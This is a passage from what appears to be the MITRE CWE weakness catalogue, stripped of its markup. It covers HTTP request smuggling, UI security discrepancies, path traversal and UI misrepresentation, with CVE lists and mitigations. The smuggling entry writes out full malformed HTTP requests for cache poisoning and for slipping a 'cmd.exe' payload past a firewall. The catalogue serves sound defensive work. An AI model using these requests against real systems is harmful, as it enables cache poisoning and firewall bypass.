updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Alternate_Terms, Applicable_Platforms, Description, Maintenance_Notes, Name, Observed_Examples, References, Relationship_Notes, Relationships, Theoretical_Notes, Type + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-14 + Per Intel Corporation suggestion, added language to be inclusive to hardware: updated Demonstrative_Examples, Description, Extended_Description, Applicable_Platforms, Potential_Mitigation, Common_Consequences, References + + + CWE Content Team + MITRE + 2020-08-20 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna + Intel Corporation + 2020-08-14 + Provided demonstrative example + + Unintended Proxy/Intermediary + + + + This weakness can be found at CWE-113. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Name + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + DEPRECATED (Duplicate): HTTP response splitting + + + + The product acts as an intermediary HTTP agent + (such as a proxy or firewall) in the data flow between two + entities such as a client and server, but it does not + interpret malformed HTTP requests or responses in ways that + are consistent with how the messages will be processed by + those entities that are at the ultimate destination. + + HTTP requests or responses ("messages") can be + malformed or unexpected in ways that cause web servers or + clients to interpret the messages in different ways than + intermediary HTTP agents such as load balancers, reverse + proxies, web caching proxies, application firewalls, + etc. For example, an adversary may be able to add duplicate + or different header fields that a client or server might + interpret as one set of messages, whereas the intermediary + might interpret the same sequence of bytes as a different + set of messages. For example, discrepancies can arise in + how to handle duplicate headers like two Transfer-encoding + (TE) or two Content-length (CL), or the malicious HTTP + message will have different headers for TE and + CL. + The inconsistent parsing and interpretation of messages + can allow the adversary to "smuggle" a message to the + client/server without the intermediary being aware of it. + This weakness is usually the result of the usage + of outdated or incompatible HTTP protocol versions in the + HTTP agents. + + + + + + + + + + + + HTTP Request Smuggling + + + HTTP Response Smuggling + + + HTTP Smuggling + + + + + Implementation + + + + + Integrity + Non-Repudiation + Access Control + Unexpected State + Hide Activities + Bypass Protection Mechanism + An attacker could create HTTP messages to exploit a number of weaknesses including 1) the message can trick the web server to associate a URL with another URL's webpage and caching the contents of the webpage (web cache poisoning attack), 2) the message can be structured to bypass the firewall protection mechanisms and gain unauthorized access to a web application, and 3) the message can invoke a script or a page that returns client credentials (similar to a Cross Site Scripting attack). + + + + + Implementation + Use a web server that employs a strict HTTP parsing procedure, such as Apache [REF-433]. + + + Implementation + Use only SSL communication. + + + Implementation + Terminate the client session after each request. + + + System Configuration + Turn all pages to non-cacheable. + + + + + In the following example, a malformed HTTP request is sent to a website that includes a proxy server and a web server with the intent of poisoning the cache to associate one webpage with another malicious webpage. + + POST http://www.website.com/foobar.html HTTP/1.1 + Host: www.website.com + Connection: Keep-Alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 0 + Content-Length: 54 + + GET /poison.html HTTP/1.1 + Host: www.website.com + Bla: GET http://www.website.com/page_to_poison.html HTTP/1.1 + Host: www.website.com + Connection: Keep-Alive + + When this request is sent to the proxy server, the proxy server parses the first four lines of the POST request and encounters the two "Content-Length" headers. The proxy server ignores the first header, so it assumes the request has a body of length 54 bytes. Therefore, it treats the data in the next three lines that contain exactly 54 bytes as the first request's body: + + GET /poison.html HTTP/1.1 + Host: www.website.com + Bla: + + The proxy then parses the remaining bytes, which it treats as the client's second request: + + GET http://www.website.com/page_to_poison.html HTTP/1.1 + Host: www.website.com + Connection: Keep-Alive + + The original request is forwarded by the proxy server to the web server. Unlike the proxy, the web server uses the first "Content-Length" header and considers that the first POST request has no body. + + POST http://www.website.com/foobar.html HTTP/1.1 + Host: www.website.com + Connection: Keep-Alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 0 + Content-Length: 54 (ignored by server) + + Because the web server has assumed the original POST request was length 0, it parses the second request that follows, i.e. for GET /poison.html: + + GET /poison.html HTTP/1.1 + Host: www.website.com + Bla: GET http://www.website.com/page_to_poison.html HTTP/1.1 + Host: www.website.com + Connection: Keep-Alive + + Note that the "Bla:" header is treated as a regular header, so it is not parsed as a separate GET request. + The requests the web server sees are "POST /foobar.html" and "GET /poison.html", so it sends back two responses with the contents of the "foobar.html" page and the "poison.html" page, respectively. The proxy matches these responses to the two requests it thinks were sent by the client - "POST /foobar.html" and "GET /page_to_poison.html". If the response is cacheable, the proxy caches the contents of "poison.html" under the URL "page_to_poison.html", and the cache is poisoned! Any client requesting "page_to_poison.html" from the proxy would receive the "poison.html" page. + When a website includes both a proxy server and a web server, some protection against this type of attack can be achieved by installing a web application firewall, or using a web server that includes a stricter HTTP parsing procedure or make all webpages non-cacheable. + Additionally, if a web application includes a Java servlet for processing requests, the servlet can check for multiple "Content-Length" headers and if they are found the servlet can return an error response thereby preventing the poison page to be cached, as shown below. + + protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + + + + // Set up response writer object + ...try { + + + // check for multiple content length headers + Enumeration contentLengthHeaders = request.getHeaders("Content-Length"); + int count = 0; + while (contentLengthHeaders.hasMoreElements()) { + count++; + } + if (count > 1) { + + // output error response + } + else { + + + // process request + + } + + + } catch (Exception ex) {...} + } + + + + + In the following example, a malformed HTTP request is sent to a website that includes a web server with a firewall with the intent of bypassing the web server firewall to smuggle malicious code into the system. + + POST /page.asp HTTP/1.1Host: www.website.comConnection: Keep-AliveContent-Length: 49223 + zzz...zzz ["z" x 49152]POST /page.asp HTTP/1.0Connection: Keep-AliveContent-Length: 30 + POST /page.asp HTTP/1.0Bla: POST /page.asp?cmd.exe HTTP/1.0Connection: Keep-Alive + + When this request is sent to the web server, the first POST request has a content-length of 49,223 bytes, and the firewall treats the line with 49,152 copies of "z" and the lines with an additional lines with 71 bytes as its body (49,152+71=49,223). The firewall then continues to parse what it thinks is the second request starting with the line with the third POST request. + Note that there is no CRLF after the "Bla: " header so the POST in the line is parsed as the value of the "Bla:" header. Although the line contains the pattern identified with a worm ("cmd.exe"), it is not blocked, since it is considered part of a header value. Therefore, "cmd.exe" is smuggled through the firewall. + When the request is passed through the firewall the web server the first request is ignored because the web server does not find an expected "Content-Type: application/x-www-form-urlencoded" header, and starts parsing the second request. + This second request has a content-length of 30 bytes, which is exactly the length of the next two lines up to the space after the "Bla:" header. And unlike the firewall, the web server processes the final POST as a separate third request and the "cmd.exe" worm is smuggled through the firewall to the web server. + To avoid this attack a Web server firewall product must be used that is designed to prevent this type of attack. + + + + The interpretation of HTTP responses can be manipulated if response headers include a space between the header name and colon, or if HTTP 1.1 headers are sent through a proxy configured for HTTP 1.0, allowing for HTTP response smuggling. This can be exploited in web browsers and other applications when used in combination with various proxy servers. For instance, the HTTP response interpreted by the front-end/client HTTP agent/entity - in this case the web browser - can interpret a single response from an adversary-compromised web server as being two responses from two different web sites. In the Example below, notice the extra space after the Content-Length and Set-Cookie headers. + + HTTP/1.1 200 OK + Date: Fri, 08 Aug 2016 08:12:31 GMT + Server: Apache (Unix) + Connection: Keep-Alive + Content-Encoding: gzip + Content-Type: text/html + Content-Length : 2345 + Transfer-Encoding: chunked + Set-Cookie : token="Malicious Code" + + <HTML> ... "Malicious Code" + + + + + + CVE-2022-24766 + SSL/TLS-capable proxy allows HTTP smuggling when used in tandem with HTTP/1.0 services, due to inconsistent interpretation and input sanitization of HTTP messages within the body of another message + https://www.cve.org/CVERecord?id=CVE-2022-24766 + + + CVE-2021-37147 + Chain: caching proxy server has improper input validation (CWE-20) of headers, allowing HTTP response smuggling (CWE-444) using an "LF line ending" + https://www.cve.org/CVERecord?id=CVE-2021-37147 + + + CVE-2020-8287 + Node.js platform allows request smuggling via two Transfer-Encoding headers + https://www.cve.org/CVERecord?id=CVE-2020-8287 + + + CVE-2006-6276 + Web servers allow request smuggling via inconsistent HTTP headers. + https://www.cve.org/CVERecord?id=CVE-2006-6276 + + + CVE-2005-2088 + HTTP server allows request smuggling with both a "Transfer-Encoding: chunked" header and a Content-Length header + https://www.cve.org/CVERecord?id=CVE-2005-2088 + + + CVE-2005-2089 + HTTP server allows request smuggling with both a "Transfer-Encoding: chunked" header and a Content-Length header + https://www.cve.org/CVERecord?id=CVE-2005-2089 + + + + + HTTP Request Smuggling + + + 26 + HTTP Request Smuggling + + + 27 + HTTP Response Smuggling + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Request smuggling can be performed due to a multiple interpretation error, where the target is an intermediary or monitor, via a consistency manipulation (Transfer-Encoding and Content-Length headers). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Name, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Name, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes, Potential_Mitigations, Theoretical_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + Critical + Extended the abstraction of this entry to include both HTTP request and response smuggling. + + + CWE Content Team + MITRE + 2022-06-28 + updated Alternate_Terms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2022-10-13 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + HTTP Request Smuggling + Interpretation Conflict in Web Traffic (aka 'HTTP Request Smuggling') + Inconsistent Interpretation of HTTP Requests (aka 'HTTP Request Smuggling') + Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') + + + + The user interface does not correctly enable or configure a security feature, but the interface provides feedback that causes the user to believe that the feature is in a secure state. + When the user interface does not properly reflect what the user asks of it, then it can lead the user into a false sense of security. For example, the user might check a box to enable a security option to enable encrypted communications, but the product does not actually enable the encryption. Alternately, the user might provide a "restrict ALL" access control rule, but the product only implements "restrict SOME". + + + + + + Primary + + + + + + + + Architecture and Design + + + Implementation + + + + + Other + Varies by Context + + + + + CVE-1999-1446 + UI inconsistency; visited URLs list not cleared when "Clear History" option is selected. + https://www.cve.org/CVERecord?id=CVE-1999-1446 + + + + + User interface inconsistency + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This entry is likely a loose composite that could be broken down into the different types of errors that cause the user interface to have incorrect interactions with the underlying security feature. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Maintenance_Notes, Other_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes, Relationship_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + User Interface Discrepancy for Security Feature + User Interface Discrepancy for Security Feature + + + + A UI function for a security feature appears to be supported and gives feedback to the user that suggests that it is supported, but the underlying functionality is not implemented. + + + + + + + + + + Implementation + + + + + Other + Varies by Context + + + + + Testing + Perform functionality testing before deploying the application. + + + + + CVE-2000-0127 + GUI configuration tool does not enable a security option when a checkbox is selected, although that option is honored when manually set in the configuration file. + https://www.cve.org/CVERecord?id=CVE-2000-0127 + + + CVE-2001-0863 + Router does not implement a specific keyword when it is used in an ACL, allowing filter bypass. + https://www.cve.org/CVERecord?id=CVE-2001-0863 + + + CVE-2001-0865 + Router does not implement a specific keyword when it is used in an ACL, allowing filter bypass. + https://www.cve.org/CVERecord?id=CVE-2001-0865 + + + CVE-2004-0979 + Web browser does not properly modify security setting when the user sets it. + https://www.cve.org/CVERecord?id=CVE-2004-0979 + + + + + Unimplemented or unsupported feature in UI + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This issue needs more study, as there are not many examples. It is not clear whether it is primary or resultant. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-12-28 + updated Other_Notes, Potential_Mitigations, Research_Gaps + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A UI function is obsolete and the product does not warn the user. + + + + + + + + + Implementation + + + + + Other + Quality Degradation + Varies by Context + + + + + Architecture and Design + Remove the obsolete feature from the UI. Warn the user that the feature is no longer supported. + + + + + Obsolete feature in UI + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The UI performs the wrong action with respect to the user's request. + + + + + + + + + Implementation + + + + + Other + Quality Degradation + Varies by Context + + + + + Testing + Perform extensive functionality testing of the UI. The UI should behave as specified. + + + + + CVE-2001-1387 + Network firewall accidentally implements one command line option as if it were another, possibly leading to behavioral infoleak. + https://www.cve.org/CVERecord?id=CVE-2001-1387 + + + CVE-2001-0081 + Command line option correctly suppresses a user prompt but does not properly disable a feature, although when the product prompts the user, the feature is properly disabled. + https://www.cve.org/CVERecord?id=CVE-2001-0081 + + + CVE-2002-1977 + Product does not "time out" according to user specification, leaving sensitive data available after it has expired. + https://www.cve.org/CVERecord?id=CVE-2002-1977 + + + + + The UI performs the wrong action + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product accepts path input in the form of multiple internal dot ('file...dir') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Multiple Internal Dot - 'file...dir' + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + An improper attempt to remove the internal dots from the string could lead to CWE-181 (Incorrect Behavior Order: Validate Before Filter). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Multiple Internal Dot - 'file...dir' + + + + The UI has multiple interpretations of user input but does not prompt the user when it selects the less secure interpretation. + + + + + + + + + Implementation + + + + + Other + Varies by Context + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Multiple Interpretations of UI Input + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The user interface (UI) does not properly represent critical information to the user, allowing the information - or its source - to be obscured or spoofed. This is often a component in phishing attacks. + + If an attacker can cause the UI to display erroneous data, or to otherwise convince the user to display information that appears to come from a trusted source, then the attacker could trick the user into performing the wrong action. This is often a component in phishing attacks, but other kinds of problems exist. For example, if the UI is used to monitor the security state of a system or network, then omitting or obscuring an important indicator could prevent the user from detecting and reacting to a security-critical event. + UI misrepresentation can take many forms: + + Incorrect indicator: incorrect information is displayed, which prevents the user from understanding the true state of the product or the environment the product is monitoring, especially of potentially-dangerous conditions or operations. This can be broken down into several different subtypes. + Overlay: an area of the display is intended to give critical information, but another process can modify the display by overlaying another element on top of it. The user is not interacting with the expected portion of the user interface. This is the problem that enables clickjacking attacks, although many other types of attacks exist that involve overlay. + Icon manipulation: the wrong icon, or the wrong color indicator, can be influenced (such as making a dangerous .EXE executable look like a harmless .GIF) + Timing: the product is performing a state transition or context switch that is presented to the user with an indicator, but a race condition can cause the wrong indicator to be used before the product has fully switched context. The race window could be extended indefinitely if the attacker can trigger an error. + Visual truncation: important information could be truncated from the display, such as a long filename with a dangerous extension that is not displayed in the GUI because the malicious portion is truncated. The use of excessive whitespace can also cause truncation, or place the potentially-dangerous indicator outside of the user's field of view (e.g. "filename.txt .exe"). A different type of truncation can occur when a portion of the information is removed due to reasons other than length, such as the accidental insertion of an end-of-input marker in the middle of an input, such as a NUL byte in a C-style string. + Visual distinction: visual information might be presented in a way that makes it difficult for the user to quickly and correctly distinguish between critical and unimportant segments of the display. + Homographs: letters from different character sets, fonts, or languages can appear very similar (i.e. may be visually equivalent) in a way that causes the human user to misread the text (for example, to conduct phishing attacks to trick a user into visiting a malicious web site with a visually-similar name as a trusted site). This can be regarded as a type of visual distinction issue. + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Non-Repudiation + Access Control + Hide Activities + Bypass Protection Mechanism + + + + + Implementation + Input Validation + Perform data validation (e.g. syntax, length, etc.) before interpreting the data. + + + Architecture and Design + Output Encoding + Create a strategy for presenting information, and plan for how to display unusual characters. + + + + + CVE-2004-2227 + Web browser's filename selection dialog only shows the beginning portion of long filenames, which can trick users into launching executables with dangerous extensions. + https://www.cve.org/CVERecord?id=CVE-2004-2227 + + + CVE-2001-0398 + Attachment with many spaces in filename bypasses "dangerous content" warning and uses different icon. Likely resultant. + https://www.cve.org/CVERecord?id=CVE-2001-0398 + + + CVE-2001-0643 + Misrepresentation and equivalence issue. + https://www.cve.org/CVERecord?id=CVE-2001-0643 + + + CVE-2005-0593 + Lock spoofing from several different weaknesses. + https://www.cve.org/CVERecord?id=CVE-2005-0593 + + + CVE-2004-1104 + Incorrect indicator: web browser can be tricked into presenting the wrong URL + https://www.cve.org/CVERecord?id=CVE-2004-1104 + + + CVE-2005-0143 + Incorrect indicator: Lock icon displayed when an insecure page loads a binary file loaded from a trusted site. + https://www.cve.org/CVERecord?id=CVE-2005-0143 + + + CVE-2005-0144 + Incorrect indicator: Secure "lock" icon is presented for one channel, while an insecure page is being simultaneously loaded in another channel. + https://www.cve.org/CVERecord?id=CVE-2005-0144 + + + CVE-2004-0761 + Incorrect indicator: Certain redirect sequences cause security lock icon to appear in web browser, even when page is not encrypted. + https://www.cve.org/CVERecord?id=CVE-2004-0761 + + + CVE-2004-2219 + Incorrect indicator: Spoofing via multi-step attack that causes incorrect information to be displayed in browser address bar. + https://www.cve.org/CVERecord?id=CVE-2004-2219 + + + CVE-2004-0537 + Overlay: Wide "favorites" icon can overlay and obscure address bar + https://www.cve.org/CVERecord?id=CVE-2004-0537 + + + CVE-2005-2271 + Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. "origin validation error" of a sort? + https://www.cve.org/CVERecord?id=CVE-2005-2271 + + + CVE-2005-2272 + Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. "origin validation error" of a sort? + https://www.cve.org/CVERecord?id=CVE-2005-2272 + + + CVE-2005-2273 + Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. "origin validation error" of a sort? + https://www.cve.org/CVERecord?id=CVE-2005-2273 + + + CVE-2005-2274 + Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. "origin validation error" of a sort? + https://www.cve.org/CVERecord?id=CVE-2005-2274 + + + CVE-2001-1410 + Visual distinction: Browser allows attackers to create chromeless windows and spoof victim's display using unprotected Javascript method. + https://www.cve.org/CVERecord?id=CVE-2001-1410 + + + CVE-2002-0197 + Visual distinction: Chat client allows remote attackers to spoof encrypted, trusted messages with lines that begin with a special sequence, which makes the message appear legitimate. + https://www.cve.org/CVERecord?id=CVE-2002-0197 + + + CVE-2005-0831 + Visual distinction: Product allows spoofing names of other users by registering with a username containing hex-encoded characters. + https://www.cve.org/CVERecord?id=CVE-2005-0831 + + + CVE-2003-1025 + Visual truncation: Special character in URL causes web browser to truncate the user portion of the "user@domain" URL, hiding real domain in the address bar. + https://www.cve.org/CVERecord?id=CVE-2003-1025 + + + CVE-2005-0243 + Visual truncation: Chat client does not display long filenames in file dialog boxes, allowing dangerous extensions via manipulations including (1) many spaces and (2) multiple file extensions. + https://www.cve.org/CVERecord?id=CVE-2005-0243 + + + CVE-2005-1575 + Visual truncation: Web browser file download type can be hidden using whitespace. + https://www.cve.org/CVERecord?id=CVE-2005-1575 + + + CVE-2004-2530 + Visual truncation: Visual truncation in chat client using whitespace to hide dangerous file extension. + https://www.cve.org/CVERecord?id=CVE-2004-2530 + + + CVE-2005-0590 + Visual truncation: Dialog box in web browser allows user to spoof the hostname via a long "user:pass" sequence in the URL, which appears before the real hostname. + https://www.cve.org/CVERecord?id=CVE-2005-0590 + + + CVE-2004-1451 + Visual truncation: Null character in URL prevents entire URL from being displayed in web browser. + https://www.cve.org/CVERecord?id=CVE-2004-1451 + + + CVE-2004-2258 + Miscellaneous -- [step-based attack, GUI] -- Password-protected tab can be bypassed by switching to another tab, then back to original tab. + https://www.cve.org/CVERecord?id=CVE-2004-2258 + + + CVE-2005-1678 + Miscellaneous -- Dangerous file extensions not displayed. + https://www.cve.org/CVERecord?id=CVE-2005-1678 + + + CVE-2002-0722 + Miscellaneous -- Web browser allows remote attackers to misrepresent the source of a 